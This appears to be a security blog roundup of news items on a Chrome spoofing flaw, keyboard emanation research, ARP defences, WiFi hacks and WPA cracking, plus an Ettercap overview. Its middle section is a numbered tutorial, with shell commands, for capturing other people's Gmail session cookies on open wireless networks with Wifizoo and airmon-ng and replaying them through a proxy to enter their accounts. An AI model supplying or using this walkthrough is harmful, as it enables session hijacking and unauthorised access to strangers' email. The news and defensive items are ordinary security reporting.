New address spoofing flaw smudges Google’s Chrome:- Google’s Chrome browser has been marred by yet another vulnerability, this one allowing attackers to impersonate websites of groups like the Better Business Bureau, PayPal or, well, Google.
Researcher Liu Die Yu of the TopsecTianRongXin research lab in Beijing says the spoofing vulnerability is the result of faulty code inserted by programmers from the Mountain View, California search behemoth. “I don’t see Apple Safari vulnerable in the same way,” he writes in an email to The Register. “They share the same engine(webkit).”
As his Proof of Concept
demonstrates, it is in fact possible to send Chrome users to a page under his control while causing the browser’s address bar to display the domain name bbb.org
A Google representative says Chrome’s spoofing vulnerability is a “known issue” that will be fixed in an update that will be pushed to end users soon. Those too impatient to wait can download version 0.3.154.3 of Chrome on Google’s Dev Channel
My friend Andrew recently posted a teaser for a new project he’s working on, but with part of the headline pixelated to obscure what the project actually is. My curiosity got the best of me and I decided to do what any self-respecting geek would do: write a program to figure out what the censored text said.
Ultimately I failed to recover most of the censored text (except “to”), so I had to cheat a little. The following video is the program running on a very similar image I created. This proves it works in ideal conditions, but needs some improvement to work in less than ideal cases. VIDEO
Applying a filter like Photoshop’s “mosaic” filter obscures the original data, but doesn’t remove it entirely. If we can reconstruct an image with known text that looks very similar to original image, then we can be pretty sure the original text is the same as our known text. more
Hi friends Today i wil be showing how to use Ettercap-NG tool for System,network admins and Security Professionals.
Below are the few things we can use Ettercap-NG
1) Passive Scanning :this Can provide Information about your network and the Attached hosts without sending packets to the machines.
2) Passive OS finger printing.
3) Search Promiscuous NICs in ur network.
4) Finding the suspicious ARP activity.
5) Finding the Unused IP address in ur Network.
6) Gateway Discover :this is used when u have a VPN connectivity in office and u want login from home so that u want the Gateway IP to be added in ur Home ISP.
still they are lot of plugins in it so just try to play with few of them u wonder how useful is this Instead of doing ARP Poisoning.
here is the Video for the above steps
Wireless Punter
Today i will Teach u how to Sniff Gmail cookies in Unsecured Wireless network using Wifizoo tool in Backtrack 3
1) mkdir /root/Desktop/wifizoo
2) cd /root/Desktop/wifizoo
3) wget http://wifizoo.info/wifizoo_black_v1.3.tar.bz2
4) tar jxvf wifizoo_black_v1.3.tar.bz2
5) cd /root/Desktop/wifizoo/wifizoo_black_v1.3
Now we’ll open the file with kwrite wifizoo.py (python script language) and modify it to match with the interface u use. at the row 50 , it will indicate the interface,
as my card is RT 73 Chipset i use rausb0
Code:
6) conf.iface = ‘rausb0′
then make sure u make ur wifi card in Monitor mode
run this command in another Terminal
7) airmon-ng start rausb0
and then monitor the Access Points
8) airodump-ng rausb0
then come back to 1st terminal
and type this command
9) python wifizoo.py -i rausb0 (your Interface)
It can be seen that interface wifizoo launches web port 8000 on the local server and the proxy is available on port 8080.
This will be very useful in the future First, let us connect to wifizoo control panel with firefox:
10)firefox 127.0.0.1:8000
And here’s administrative interface Wifizoo
We get down to business by clicking on “Cookies”:
heyyy Wifizoo has captured cookies, you can see the image on a cookie google mail.
Before you can use these cookies, you must configure Firefox to connect through proxy turning locally on port 8080. It is in Edit, Preferences, Network, check on Manual proxy configuration and configure the HTTP proxy on port 8080, then
We can now return to the “Cookies” panel Wifizoo hotel. By clicking on the cookie gmail (all information about the cookie, in blue), wifizoo will automatically build on the currently used proxy on port 8080. The indication “Cookie Set!” shows that the cookie has been forged and can be reused>
Then simply click jump to it will take u to Google.com then click mail.
you r done u have Sniffed others cookies.
So never use Unsecure Wireless Networks,
Be secure Stay secure
Below is the Video Tutorial
Tutorial by
WirelessPunter
A team of Swiss researchers say there are several ways to recover keystrokes from wired keyboards by simply measuring the electromagnetic radiations emitted when keys are pressed.
In all, the team of researchers from the Security and Cryptography Laboratory in Lausanne, Switzerland, found four different ways to fully or partially recover keystrokes from wired keyboards at a distance up to 20 meters, even through walls. you can watch the video
more
There are lots of tools around to help people carry out ARP-related exploits and if a malicious, Wi-Fi enabled neighbour decided to find out more about your network, this could be an effective way to do it.
The good news is that there are some defences out there. The bad? They can be costly and don’t always deliver the protection you might expect.
Arpdefender is a good example. It’s a solid-state security appliance that you simply connect to your network, then leave to look out for ARP poisoning attacks. It would be excellent if not for the fact that it costs almost £300 and, even if it does detect an attack, will do little more than make an entry in your system logs more
GSS says US hotel WiFi hack attack could happen in UK
IT security consultancy Global Secure Systems has warned that insecure WiFi systems installed at hotels across the UK could be hacked with embarrassing consequences, as has happened with the high-end Thompson hotel chain in the US.
“Weekend reports in the US suggest that a hacker has threatened to release a number of embarrassing emails sent and received by guests and staff at the high-end Thompson hotel chain there,” said David Hobson, GSS’ managing director more
Improved WPA and WPA2 password-cracking tool causes concern…
Elcomsoft’s announcement of an improved version of its Distributed Password Recovery (EDPR) tool that can crack WPA and WPA2 passwords faster has caused concern among users and specialists. The UK’s Secure Computing magazine is quoting Global Secure Systems, a provider of security services, as saying that securing a WLAN solely with WPA or WPA2 is no longer sufficient. additional protection with VPN encryption is necessary. more.
The intrusion, revealed Friday in a FoxNews.com story by veteran investigative reporter Richard Behar, underscores how relentlessly criminals probe corporate IT systems, especially banks, say tech-security experts.
A Canadian computer whiz who hacked into some of the world’s most prominent websites when he was just 15 years old revealed in a new tell-all book that he was motivated by a so-called “hacker war.”The hacker, known as Mafiaboy, said that back in 2000 when he cracked sites like Yahoo and eBay, computer hackers frequented chat rooms where they were constantly challenging each other.
“Obviously, as you can see, it got a bit out of hand,” Mafiaboy, whose real name is Michael Calce, said Thursday in an interview on CTV’s Canada AM.
In 2000, a hacker from Montreal known only as Mafiaboy managed to shut down five websites, including Yahoo, eBay and CNN. more